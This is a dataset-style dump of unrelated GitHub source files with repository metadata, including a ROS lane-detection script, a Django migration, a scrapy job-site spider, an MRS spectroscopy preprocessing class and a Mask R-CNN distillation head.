xl_phs_q = [0]*15
count = 0
# Scale down the image - Just for better display.
orig_height,orig_width=orig_img.shape[:2]
orig_img=cv2.resize(orig_img,(orig_width/2,orig_height/2),interpolation = cv2.INTER_CUBIC)
orig_height,orig_width=orig_img.shape[:2]
# Part of the image to be considered for lane detection
upper_threshold=0.4
lower_threshold=0.2
# Copy the part of original image to temporary image for analysis.
img=orig_img[int(upper_threshold*orig_height):int((1- lower_threshold)*orig_height),:]
# Convert temp image to GRAY scale
img=cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
height,width=img.shape[:2]
# Image processing to extract better information form images.
# Adaptive Biateral Filter:
img = cv2.adaptiveBilateralFilter(img,ksize=(5,5),sigmaSpace=2)
# Equalize the histogram to account for better contrast in the images.
img = cv2.equalizeHist(img);
# Apply Canny Edge Detector to detect the edges in the image.
bin_img = cv2.Canny(img,30,60,apertureSize = 3)
#Thresholds for lane detection. Emperical values, detected from trial and error.
xl_low = int(-1*orig_width) # low threshold for left x_intercept
xl_high = int(0.8*orig_width) # high threshold for left x_intercept
xr_low = int(0.2*orig_width) # low threshold for right x_intercept
xr_high = int(2*orig_width) # high threshold for right x_intercept
xl_phase_threshold = 15 # Minimum angle for left x_intercept
xr_phase_threshold = 14 # Minimum angle for right x_intercept
xl_phase_upper_threshold = 80 # Maximum angle for left x_intercept
xr_phase_upper_threshold = 80 # Maximum angle for right x_intercept
# Arrays/Containers for intercept values and phase angles.
xl_arr = np.zeros(xl_high-xl_low)
xr_arr = np.zeros(xr_high-xr_low)
xl_phase_arr = []
xr_phase_arr = []
# Intercept Bandwidth: Used to assign weights to neighboring pixels.
intercept_bandwidth = 6
# Run Probabilistic Hough Transform to extract line segments from Binary image.
lines=cv2.HoughLinesP(bin_img,rho=1,theta=np.pi/180,threshold=30,minLineLength=20,maxLineGap=5)
# Loop for every single line detected by Hough Transform
# print len(lines[0])
for x1,y1,x2,y2 in lines[0]:
if(x1<x2 and y1>y2 and x1 < 0.6*width and x2 > 0.2*width):
norm = cv2.norm(float(x1-x2),float(y1-y2))
phase = cv2.phase(np.array(x2-x1,dtype=np.float32),np.array(y1-y2,dtype=np.float32),angleInDegrees=True)
if(phase<xl_phase_threshold or phase > xl_phase_upper_threshold or x1 > 0.5 * orig_width): #Filter out the noisy lines
continue
xl = int(x2 - (height+lower_threshold*orig_height-y2)/np.tan(phase*np.pi/180))
# Show the Hough Lines
# cv2.line(orig_img,(x1,y1+int(orig_height*upper_threshold)),(x2,y2+int(orig_height*upper_threshold)),(0,0,255),2)
# If the line segment is a lane, get weights for x-intercepts
try:
for i in range(xl - intercept_bandwidth,xl + intercept_bandwidth):
xl_arr[i-xl_low] += (norm**0.5)*y1*(1 - float(abs(i - xl))/(2*intercept_bandwidth))*(phase**2)
except IndexError:
# print "Debug: Left intercept range invalid:", xl
continue
xl_phase_arr.append(phase[0][0])
elif(x1<x2 and y1<y2 and x2>0.6*width and x1 < 0.8*width):
norm = cv2.norm(float(x1-x2),float(y1-y2))
phase = cv2.phase(np.array(x2-x1,dtype=np.float32),np.array(y2-y1,dtype=np.float32),angleInDegrees=True)
if(phase<xr_phase_threshold or phase > xr_phase_upper_threshold or x2 < 0.5 * orig_width): #Filter out the noisy lines
continue
xr = int(x1 + (height+lower_threshold*orig_height-y1)/np.tan(phase*np.pi/180))
# Show the Hough Lines
# cv2.line(orig_img,(x1,y1+int(orig_height*upper_threshold)),(x2,y2+int(orig_height*upper_threshold)),(0,0,255),2)
# If the line segment is a lane, get weights for x-intercepts
try:
for i in range(xr - intercept_bandwidth,xr + intercept_bandwidth):
xr_arr[i-xr_low] += (norm**0.5)*y2*(1 - float(abs(i - xr))/(2*intercept_bandwidth))*(phase**2)
except IndexError:
# print "Debug: Right intercept range invalid:", xr
continue
xr_phase_arr.append(phase[0][0])
else:
pass # Invalid line - Filter out orizontal and other noisy lines.
# Sort the phase array and get the best estimate for phase angle.
try:
xl_phase_arr.sort()
xl_phase = xl_phase_arr[-1] if (xl_phase_arr[-1] < np.mean(xl_phase_arr) + np.std(xl_phase_arr)) else np.mean(xl_phase_arr) + np.std(xl_phase_arr)
except IndexError:
# print "Debug: ", fname + " has no left x_intercept information"
pass
try:
xr_phase_arr.sort()
xr_phase = xr_phase_arr[-1] if (xr_phase_arr[-1] < np.mean(xr_phase_arr) + np.std(xr_phase_arr)) else np.mean(xr_phase_arr) + np.std(xr_phase_arr)
except IndexError:
# print "Debug: ", fname + " has no right x_intercept information"
pass
# Get the index of x-intercept (700 is for positive numbers for particle filter.)
pos_int = np.argmax(xl_arr)+xl_low+700
# Apply Particle Filter.
xl_int = xl_int_pf.filterdata(data=pos_int)
xl_phs = xl_phs_pf.filterdata(data=xl_phase)
# Draw lines for display
cv2.line(orig_img,
(int(xl_int-700), orig_height),
(int(xl_int-700) + int(orig_height*0.3/np.tan(xl_phs*np.pi/180)),int(0.7*orig_height)),(0,255,255),2)
# Apply Particle Filter.
xr_int = xr_int_pf.filterdata(data=np.argmax(xr_arr)+xr_low)
xr_phs = xr_phs_pf.filterdata(data=xr_phase)
# Draw lines for display
cv2.line(orig_img,
(int(xr_int), orig_height),
(int(xr_int) - int(orig_height*0.3/np.tan(xr_phs*np.pi/180)),int(0.7*orig_height)),(0,255,255),2)
# print "Degbug: %5d\t %5d\t %5d\t %5d %s"%(xl_int-700,np.argmax(xl_arr)+xl_low,xr_int,np.argmax(xr_arr)+xr_low,fname)
fname = "test_frame"
intercepts.append((xl_int[0]-700, xr_int[0]))
# Show image
cv2.imshow('Lane Markers', orig_img)
key = cv2.waitKey(30)
if key == 27:
cv2.destroyAllWindows();
sys.exit(0)
def main(args):
rospy.init_node('PathFollower', anonymous=True)
ic = PathFollower()
try:
rospy.spin()
except KeyboardInterrupt:
print("shutting down")
cv2.destroyAllWindows()
if __name__ == '__main__':
try:
main(sys.argv)
except rospy.ROSInterruptException:
pass
| [
"fyp16010@gmail.com"
] | fyp16010@gmail.com |
c9d99ec9f87041eb0577f08fd01cab6264d3abd1 | 72a05ac540052e426c88245d3ffe12a1a08de362 | /MME/g/PBR/thumbnail_x256.py | 202f7990098ea972ffc8187f29cd264977677c45 | [] | no_license | pennennennennennenem/pennennennennennenem.github.io | 486c60595a05f76b0879f0511a46b5dd864d6503 | 8bbf8edb36c32fef67874b36e9563826196d21a0 | refs/heads/master | 2022-09-29T07:44:44.397982 | 2022-09-09T02:11:20 | 2022-09-09T02:11:20 | 253,360,771 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from PIL import Image
import sys
import os
i=Image.open(sys.argv[1]).convert('RGB')
i.thumbnail((256,256*i.size[1]/i.size[0]))
i.save(os.path.splitext(sys.argv[1])[0] + '_s.jpg') | [
"56704844+pennennennennennenem@users.noreply.github.com"
] | 56704844+pennennennennennenem@users.noreply.github.com |
ad63402027f5c0450e9fb9b04104c95a7de2b965 | 4a8c8bbfb6c1785bb97660020c5e577d887ce4e2 | /account/migrations/0001_initial.py | 6270082a88774730f22c4712ab9b630efc262380 | [] | no_license | Eldiyar0220/Hackstone | 7faf50c49509e8b306df01c3446be40fd87e091f | 2133bc176cd23a4ba7c6ea821a799cd7b2a88e8a | refs/heads/main | 2023-06-05T19:39:44.337879 | 2021-06-27T12:46:07 | 2021-06-27T12:46:07 | 379,862,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,396 | py | # Generated by Django 3.1 on 2021-06-24 08:44
import account.models
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='MyUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('email', models.EmailField(max_length=254, unique=True)),
('is_active', models.BooleanField(default=False)),
('activation_code', models.CharField(blank=True, max_length=50)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', account.models.MyUserManager()),
],
),
]
| [
"Ebolotov904@gmail.com"
] | Ebolotov904@gmail.com |
145365adce5937414e20b7f9ff9e38120c14843d | 776341e5dc617ece09c290afe66311e058fd0144 | /send_to_arduino.py | 5c7e6eaaec42013e7d8779b544a7ffb891248b46 | [] | no_license | deysonali/Project-Lumos | a896ff727d472576ed4a2e8feab29103d7a53812 | b2d368494b04b82da7fa8ab417a85cdda99813e7 | refs/heads/main | 2023-01-14T05:07:27.946089 | 2020-11-23T05:57:39 | 2020-11-23T05:57:39 | 315,214,194 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 940 | py | import serial
import time
# The following line is for serial over GPIO
port = "COM6"
ard = serial.Serial(port, 9600, timeout=5)
time.sleep(2)
i = 0
setTemp1 = bytes(str(1), 'utf-8')
setTemp2 = bytes(str(0), 'utf-8')
for i in range(0, 2): # Represents 1 (right) followed by a 0 (left) received from our SVM model results
# Serial write section
if i % 2 == 0: # if we see a 1
ard.write(setTemp1)
print("Python value sent: ")
print(setTemp1)
time.sleep(5)
else: # if we see a 0
ard.write(setTemp2)
print("Python value sent: ")
print(setTemp2)
time.sleep(5) # with the port open, the response will be buffered
# so wait a bit longer for response here
# Serial read section
msg = ard.read(ard.inWaiting()) # read everything in the input buffer
print("Message from Arduino: ")
print(msg)
time.sleep(5)
| [
"noreply@github.com"
] | noreply@github.com |
b857744f18041b979948a7934c4d4b680381dead | 6b9d52ade00538e6a950deffc9342c66edd6cc04 | /zhipin/zhipin/spiders/AreaSpider.py | 1f9514e4270a9f504ed9267ae245203973504728 | [] | no_license | asmaaelkeurti/scrapy | b4354630ded384c724b4802cdad7d98098f455c3 | 77ed01cea149711d6acdd66d994f6b9976073c6f | refs/heads/master | 2020-06-14T01:31:31.226963 | 2019-07-26T02:39:17 | 2019-07-26T02:39:17 | 194,851,756 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,089 | py | import scrapy
from ..items import AreaItem
import pymongo
class AreaSpider(scrapy.Spider):
name = "area_url"
custom_settings = {
'DOWNLOAD_DELAY': 20,
'ITEM_PIPELINES': {'zhipin.pipelines.AreaPipeline': 400},
'DOWNLOADER_MIDDLEWARES': {'zhipin.middlewares.ZhipinUserAgentMiddleware': 100}
}
def start_requests(self):
client = pymongo.MongoClient('mongodb://localhost:27017/')
db = client['zhipin']
for d in db['district_items'].find():
yield scrapy.Request(url=d['district_link'], callback=self.parse)
def parse(self, response):
area_result = list(zip(response.xpath('//div[@class="condition-box"]/dl[3]/dd/a/@href').getall()[1:],
response.xpath('//div[@class="condition-box"]/dl[3]/dd/a/text()').getall()[1:]))
for link in area_result:
if len(link[0]) > 20:
yield AreaItem(
district_link=response.request.url,
area_link=response.urljoin(link[0]),
area_name=link[1])
| [
"asmaaelkeurti@aliyun.com"
] | asmaaelkeurti@aliyun.com |
bd64520533edfc4080a9c62fe2f73533c225df98 | 952a9bc5a54bae037662f3bd5e09aa13780628a2 | /vespa/analysis/block_prep_megalaser.py | d9ee800348907f04ad9ee6a673913aebdecb9e0a | [
"BSD-3-Clause"
] | permissive | bsoher/vespa_py2 | 199964d2ffdc6ed576d6d73e55078ed5bc26c784 | 07cd67de2465607319870a18435da784345198d0 | refs/heads/main | 2023-04-22T04:24:44.270731 | 2021-05-06T01:07:57 | 2021-05-06T01:07:57 | 364,384,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,109 | py | # Python modules
from __future__ import division
# 3rd party modules
import numpy as np
import xml.etree.cElementTree as ElementTree
# Our modules
import vespa.analysis.block_prep_identity as block_prep_identity
import vespa.analysis.chain_prep_megalaser as chain_prep_megalaser
import vespa.analysis.block as block
import vespa.common.util.xml_ as util_xml
import vespa.common.util.misc as util_misc
import vespa.common.constants as common_constants
import vespa.common.mrs_data_raw as mrs_data_raw
from vespa.common.constants import Deflate
class _Settings(object):
# The XML_VERSION enables us to change the XML output format in the future
XML_VERSION = "1.0.0"
def __init__(self, attributes=None):
"""
Currently there are no input parameters set in this object. This may
change in the future, or this object may serve as a base class for
other "raw" types of data objects that need to do a bit of massaging
of the data as it comes in (e.g. align and sum individual FIDs for
an SVS data set).
"""
self.fid_left_shift = 0
self.gaussian_apodization = 2.0
self.global_phase1 = 0.0
self.apply_peak_shift = True
self.reference_peak_center = 2.01
self.peak_search_width = 0.2
self.fid_left_shift_b0 = 56
self.apply_phase0 = True
self.phase0_range_start = 2.2
self.phase0_range_end = 1.8
self.fid_left_shift_phase0 = 56
self.ref_spectrum_source = 'singlet_centered_in_range'
self.ref_peak_line_width = 18
self.constant_phase0_offset = 70 # degrees
if attributes is not None:
self.inflate(attributes)
def __str__(self):
return self.__unicode__().encode("utf-8")
def __unicode__(self):
lines = [ ]
lines.append("--- Block Preprocess Megalaser Settings ---")
lines.append("fid_left_shift : " + unicode(self.fid_left_shift))
lines.append("gaussian_apodization : " + unicode(self.gaussian_apodization))
lines.append("apply_peak_shift : " + unicode(self.apply_peak_shift))
lines.append("reference_peak_center : " + unicode(self.reference_peak_center))
lines.append("peak_search_width : " + unicode(self.peak_search_width))
lines.append("fid_left_shift_b0 : " + unicode(self.fid_left_shift_b0))
lines.append("apply_phase0 : " + unicode(self.apply_phase0))
lines.append("phase0_range_start : " + unicode(self.phase0_range_start))
lines.append("phase0_range_end : " + unicode(self.phase0_range_end))
lines.append("fid_left_shift_phase0 : " + unicode(self.fid_left_shift_phase0))
lines.append("ref_spectrum_source : " + unicode(self.ref_spectrum_source))
lines.append("ref_peak_line_width : " + unicode(self.ref_peak_line_width))
lines.append("constant_phase0_offset : " + unicode(self.constant_phase0_offset))
# __unicode__() must return a Unicode object. In practice the code
# above always generates Unicode, but we ensure it here.
return u'\n'.join(lines)
def deflate(self, flavor=Deflate.ETREE):
if flavor == Deflate.ETREE:
e = ElementTree.Element("settings", {"version" : self.XML_VERSION})
util_xml.TextSubElement(e, "fid_left_shift", self.fid_left_shift)
util_xml.TextSubElement(e, "gaussian_apodization", self.gaussian_apodization)
util_xml.TextSubElement(e, "global_phase1", self.global_phase1)
util_xml.TextSubElement(e, "apply_peak_shift", self.apply_peak_shift)
util_xml.TextSubElement(e, "reference_peak_center", self.reference_peak_center)
util_xml.TextSubElement(e, "peak_search_width", self.peak_search_width)
util_xml.TextSubElement(e, "fid_left_shift_b0", self.fid_left_shift_b0)
util_xml.TextSubElement(e, "apply_phase0", self.apply_phase0)
util_xml.TextSubElement(e, "phase0_range_start", self.phase0_range_start)
util_xml.TextSubElement(e, "phase0_range_end", self.phase0_range_end)
util_xml.TextSubElement(e, "fid_left_shift_phase0", self.fid_left_shift_phase0)
util_xml.TextSubElement(e, "ref_spectrum_source", self.ref_spectrum_source)
util_xml.TextSubElement(e, "ref_peak_line_width", self.ref_peak_line_width)
util_xml.TextSubElement(e, "constant_phase0_offset", self.constant_phase0_offset)
return e
elif flavor == Deflate.DICTIONARY:
return self.__dict__.copy()
def inflate(self, source):
if hasattr(source, "makeelement"):
# Quacks like an ElementTree.Element
for name in ("reference_peak_center",
"gaussian_apodization",
"peak_search_width",
"global_phase1",
'phase0_range_start',
'phase0_range_end'):
item = source.findtext(name)
if item is not None:
setattr(self, name, float(item))
for name in ("fid_left_shift",
"fid_left_shift_b0",
"fid_left_shift_phase0",
"ref_peak_line_width",
"constant_phase0_offset"):
item = source.findtext(name)
if item is not None:
setattr(self, name, int(item))
for name in ("apply_peak_shift",
"apply_phase0", ):
item = source.findtext(name)
if item is not None:
setattr(self, name, util_xml.BOOLEANS[item])
for name in ("ref_spectrum_source",):
item = source.findtext(name)
if item is not None:
setattr(self, name, item)
elif hasattr(source, "keys"):
# Quacks like a dict
for key in source.keys():
if hasattr(self, key):
setattr(self, key, source[key])
class BlockPrepMegalaser(block_prep_identity.BlockPrepIdentity):
"""
This is a building block object that can be used to create a list of
processing blocks.
This object represents preprocessing of the raw data from the first
block ('raw') in the dataset.blocks list.
We sub-class from BlockPrepIdentity base class to minimize recreating
wheels, but to also leave us the flexibility of extending this class
in the future for any 'special children' types of data loading.
In here we also package all the functionality needed to save and recall
these values to/from an XML node.
"""
# The XML_VERSION enables us to change the XML output format in the future
XML_VERSION = "1.0.0"
def __init__(self, attributes=None):
"""
Here we set up the standard functionality of the base class
"""
block_prep_identity.BlockPrepIdentity.__init__(self, attributes)
#----------------------------------------
# processing parameters
self.set = _Settings()
#----------------------------------------
# results storage
self.frequency_shift = None
self.phase_0 = None
self.data = None
if attributes is not None:
self.inflate(attributes)
self.chain = None
##### Standard Methods and Properties #####################################
# # This overrides the data property from the Identity class which is read
# # only. This form allows us to read/write
# def __get_data(self):
# return self._data
# def __set_data(self, data):
# self._data = data
# data = property(__get_data, __set_data)
@property
def dims(self):
"""Data dimensions in a list, e.g. [1024, 1, 1, 1]. It's read only."""
# Note that self.data.shape is a tuple. Dims must be a list.
if self.data is not None:
return list(self.data.shape[::-1])
return None
def __str__(self):
return self.__unicode__().encode("utf-8")
def __unicode__(self):
lines = mrs_data_raw.DataRaw.__unicode__(self).split('\n')
lines[0] = "----------- DataPrepMegalaser Object ------------"
lines.append("Data shape : %s" % str(self.dims))
return u'\n'.join(lines)
def create_chain(self, dataset):
self.chain = chain_prep_megalaser.ChainPrepMegalaser(dataset, self)
def set_dims(self, dataset):
"""
Given a Dataset object, this is an opportunity for this block object
to ensure that its dims match those of the parent dataset.
"""
block.Block.set_dims(self, dataset)
# local reference to input data
raw = dataset.get_source_data('prep')
# this is the calculated proper size for self.data
fidsum_dims = [raw.shape[-1],1,1,1]
if not self.dims or self.dims != fidsum_dims:
self._reset_dimensional_data(dataset)
def _reset_dimensional_data(self, dataset):
"""
Resets (to zero) and resizes dimensionally-dependent data
"""
# local reference to input data
raw = dataset.get_source_data('prep')
n_fids = raw.shape[-2]
self.frequency_shift = np.zeros([n_fids])
self.phase_0 = np.zeros([n_fids])
self.data = np.zeros((1,1,1,raw.shape[-1]), dtype=raw.dtype)
if self.chain is not None:
self.chain.reset_results_arrays()
def concatenate(self, new):
raise NotImplementedError
def deflate(self, flavor=Deflate.ETREE):
if flavor == Deflate.ETREE:
e = ElementTree.Element("block_prep_megalaser",
{ "id" : self.id,
"version" : self.XML_VERSION})
util_xml.TextSubElement(e, "behave_as_preset", self.behave_as_preset)
# Now I deflate the attribs that are specific to this class
e.append(self.set.deflate())
if not self.behave_as_preset:
e.append(util_xml.numpy_array_to_element(self.frequency_shift,'frequency_shift'))
e.append(util_xml.numpy_array_to_element(self.phase_0,'phase_0'))
e.append(util_xml.numpy_array_to_element(self.data, 'data'))
return e
elif flavor == Deflate.DICTIONARY:
return self.__dict__.copy()
def inflate(self, source):
if hasattr(source, "makeelement"):
val = source.findtext("behave_as_preset") # default is False
if val is not None:
self.behave_as_preset = util_xml.BOOLEANS[val]
# Quacks like an ElementTree.Element
self.set = _Settings(source.find("settings"))
if not self.behave_as_preset:
# Now I inflate the attribs that are specific to this class
temp = source.find("frequency_shift")
self.frequency_shift = util_xml.element_to_numpy_array(temp)
temp = source.find("phase_0")
self.phase_0 = util_xml.element_to_numpy_array(temp)
temp = source.find("data")
self.data = util_xml.element_to_numpy_array(temp)
elif hasattr(source, "keys"):
# Quacks like a dict
for key in source.keys():
if key == "set":
setattr(self, key, source[key])
##### Private Methods #####################################
| [
"bsoher@briansoher.com"
] | bsoher@briansoher.com |
91cf1bbafb30679fda22289ccab052d7605c72e6 | 503d2f8f5f5f547acb82f7299d86886691966ca5 | /typical90/typical90_cf.py | f610d0f1035ed452bc7992ce2b7ed0d6160b139f | [] | no_license | Hironobu-Kawaguchi/atcoder | 3fcb649cb920dd837a1ced6713bbb939ecc090a9 | df4b55cc7d557bf61607ffde8bda8655cf129017 | refs/heads/master | 2023-08-21T14:13:13.856604 | 2023-08-12T14:53:03 | 2023-08-12T14:53:03 | 197,216,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 937 | py | # https://atcoder.jp/contests/typical90/tasks/typical90_cf
# # def input(): return sys.stdin.readline().rstrip()
# # input = sys.stdin.readline
# from numba import njit
# from functools import lru_cache
# import sys
# input = sys.stdin.buffer.readline
# sys.setrecursionlimit(10 ** 7)
N = int(input())
S = input()
ans = 0
last = [-1]*2
for i in range(N):
if S[i]=='o':
last[0] = i
else:
last[1] = i
if last[0]==-1 or last[1]==-1:
continue
ans += min(last[0], last[1]) + 1
# print(ans, last)
print(ans)
# S = input()
# n = int(input())
# N, K = map(int, input().split())
# l = list(map(int, (input().split())))
# A = [[int(i) for i in input().split()] for _ in range(N)]
# import sys
# it = map(int, sys.stdin.buffer.read().split())
# N = next(it)
# @njit('(i8,i8[::1],i4[::1])', cache=True)
# def main():
# @lru_cache(None)
# def dfs():
# return
# return
# main()
| [
"hironobukawaguchi3@gmail.com"
] | hironobukawaguchi3@gmail.com |
f8f04d4798e994490ad6ecaf3e1eb17c2424110d | ed72797056e0a3013dc61c81399bd8b56042787a | /src/frame/home_frame.py | 04cda5cf5df03425e53af75d53c46fac99163cdc | [] | no_license | pooetitu/anime-companion | 95f5088cbc470559bb650d4d6f830a58c7005999 | 6aea8e805c7f5adf976882988a8a9b7ef2394440 | refs/heads/master | 2023-06-22T16:21:58.104600 | 2021-07-25T19:03:21 | 2021-07-25T19:03:21 | 376,633,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | from tkinter import ttk
import requests
from kitsu.models import Anime
from src.cards.anime_info_card import AnimeInfoCard
from src.frame.scrollable_frame import ScrollableFrame
class HomeFrame(ttk.Frame):
def __init__(self, function_display_anime_details, master=None):
super().__init__(master)
self.master = master
self.function_display_anime_details = function_display_anime_details
self.pack()
self.anime_list = []
self.scrollable = ScrollableFrame(self)
self.scrollable.pack(fill='both', expand=1)
self.create_widgets()
def create_widgets(self):
self.load_trend()
def load_trend(self):
animes = requests.get("https://kitsu.io/api/edge/trending/anime?limit=9").json()
for data in animes['data']:
card = AnimeInfoCard(Anime("anime", data), self.function_display_anime_details,
master=self.scrollable.scrollable_frame)
self.anime_list.append(card)
card.pack(pady=5, fill='both', expand=1)
| [
"pooetitu@gmail.com"
] | pooetitu@gmail.com |
f5783ec97d4eb45d76b501c9cb44fb45c9fa027e | 96872bbac90845189ac1276b91795ce6253442f5 | /class-activities/loopActivity.py | 158493003486f4bc9b4667571b53002f366c5ddf | [] | no_license | rubenavaldez/Python-sandbox | 4e9d1ff609cd4a70d5f8ea0eb70d576d2f438e5a | 02a02a899f4aa66f3b7b7fa28a020cb22ebb40cc | refs/heads/master | 2022-10-13T00:48:54.547441 | 2019-10-29T05:34:34 | 2019-10-29T05:34:34 | 218,170,216 | 0 | 1 | null | 2022-10-07T02:11:38 | 2019-10-29T00:22:35 | Python | UTF-8 | Python | false | false | 1,160 | py | correctAnswer = False
while correctAnswer == False:
answer = input("What is 2 + 2?")
if answer == "4":
print("Correct!")
correctAnswer = True
else:
print("Incorrect!")
verify = False
friendlies = []
while verify == False:
yourName = input("What is your name?")
print("We have",yourName," saved as your name.")
verification = input("is this information correct?")
if verification == "yes":
verify = True
verifyTwo = False
while verifyTwo == False:
addFriend = input("Would you like to add a new friend?")
if addFriend == "yes":
verifyThree = False
while verifyThree == False:
friendName = input("What is your friend's name?")
print("We have",friendName," saved as your friend's name.")
verificationTwo = input("is this information correct?")
if verificationTwo == "yes":
verifyThree = True
friendlies.append(friendName)
else:
verifyTwo = True
print(yourName,", we have successfuly added your friends:")
i = 0
while i < len(friendlies):
print(friendlies[i])
i += 1 | [
"ruben.valdez7@gmail.com"
] | ruben.valdez7@gmail.com |
fdcc8e2352fb90f3dce50f2dab1f09b450c20e09 | dc4d01e9de93e2538a8ce6fd52d9c42d26fa4bb5 | /week04/evil-loopy-lists.py | 7a94be418658fabefba21affca71cb9a77682d21 | [] | no_license | katiecla/CA268 | 27e5e867977aca11b46f642660ab4ad88d90f6a7 | 1607ff781da20d5ac0a3e617a4b06451f36d5ca2 | refs/heads/master | 2022-03-29T09:09:58.912601 | 2020-01-24T15:22:43 | 2020-01-24T15:22:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | def detect_loop(lst):
root = lst.head
ptr = lst.head
while ptr != None:
if ptr.next == root:
return True
ptr = ptr.next
return False | [
"noreply@github.com"
] | noreply@github.com |
84e3065e22fd5fe1e88286d0f462bcf02326e85b | ba94c9951adcde0392ab673fc0bb5fff7e422f40 | /main.py | 1b159e4cc71ebff07177891fc9b807ef83a3c673 | [] | no_license | georgwassen/Reports | 4c21491be0a599bee45f1f710c6ee75172ae3a13 | 785b16d2823fc63b20b16e5fb425a78d8dfda887 | refs/heads/master | 2021-01-19T13:14:28.041250 | 2014-06-02T10:07:53 | 2014-06-02T10:07:53 | 20,394,766 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | #!/usr/bin/env python
from storm.locals import *
import data_def
import generate_data
import reports
if __name__ == "__main__":
#database = create_database("sqlite:test.db")
database = create_database("sqlite:")
store = Store(database)
data_def.create_db(store)
generate_data.generate_testdata(store)
store.commit()
reports.meldungen(store)
| [
"georg.wassen@googlemail.com"
] | georg.wassen@googlemail.com |
737f03f10ca5c122cad3e6ecd1ea3ca167ba591a | 2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae | /python/python_7114.py | 43772d7ec5384a7033d876749b4875f9abf3a978 | [] | no_license | AK-1121/code_extraction | cc812b6832b112e3ffcc2bb7eb4237fd85c88c01 | 5297a4a3aab3bb37efa24a89636935da04a1f8b6 | refs/heads/master | 2020-05-23T08:04:11.789141 | 2015-10-22T19:19:40 | 2015-10-22T19:19:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | # global name 'find' is not defined
'python'.find('y') # gives 1
| [
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] | ubuntu@ip-172-31-7-228.us-west-2.compute.internal |
eb7c26a791fa2b8b0975f500d74956c92c74716c | f36ba856476a99592e5570f13c9d321d9b914bde | /maskrcnn_benchmark/modeling/roi_heads/soft_roi_heads.py | 55afdce3de9aff40204efb7d0102929cf812a421 | [
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | huajianni666/maskrcnn-benchmark-distillation | 1448b7c94e723833463efec4c2744097adf7b83b | 8543f26c44a8f0a4d178548bd08471bf53498381 | refs/heads/master | 2020-04-02T16:01:57.402542 | 2019-02-18T06:08:57 | 2019-02-18T06:08:57 | 154,594,906 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,436 | py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch
from .box_head.soft_box_head import build_soft_roi_box_head
from .mask_head.mask_head import build_roi_mask_head
class CombinedROIHeads(torch.nn.ModuleDict):
"""
Combines a set of individual heads (for box prediction or masks) into a single
head.
"""
def __init__(self, teacher_cfg,student_cfg, heads):
super(CombinedROIHeads, self).__init__(heads)
self.teacher_cfg = teacher_cfg.clone()
self.student_cfg = student_cfg.clone()
if student_cfg.MODEL.MASK_ON and student_cfg.MODEL.ROI_MASK_HEAD.SHARE_BOX_FEATURE_EXTRACTOR:
self.mask.feature_extractor = self.box.student_feature_extractor
def forward(self, teacher_features, student_features, teacher_proposals, student_proposals, targets=None):
losses = {}
# TODO rename x to roi_box_features, if it doesn't increase memory consumption
x, detections, loss_box = self.box(teacher_features, student_features, teacher_proposals, student_proposals, targets)
losses.update(loss_box)
if self.student_cfg.MODEL.MASK_ON:
mask_features = student_features
# optimization: during training, if we share the feature extractor between
# the box and the mask heads, then we can reuse the features already computed
if (
self.training
and self.student_cfg.MODEL.ROI_MASK_HEAD.SHARE_BOX_FEATURE_EXTRACTOR
):
mask_features = x
# During training, self.box() will return the unaltered proposals as "detections"
# this makes the API consistent during training and testing
x, detections, loss_mask = self.mask(mask_features, detections, targets)
losses.update(loss_mask)
return x, detections, losses
def build_soft_roi_heads(teacher_cfg, student_cfg):
# individually create the heads, that will be combined together
# afterwards
roi_heads = []
if not student_cfg.MODEL.RPN_ONLY:
roi_heads.append(("box", build_soft_roi_box_head(teacher_cfg,student_cfg)))
if student_cfg.MODEL.MASK_ON:
roi_heads.append(("mask", build_roi_mask_head(student_cfg)))
# combine individual heads in a single module
if roi_heads:
roi_heads = CombinedROIHeads(teacher_cfg, student_cfg, roi_heads)
return roi_heads
| [
"gezishuai@qiniu.com"
] | gezishuai@qiniu.com |
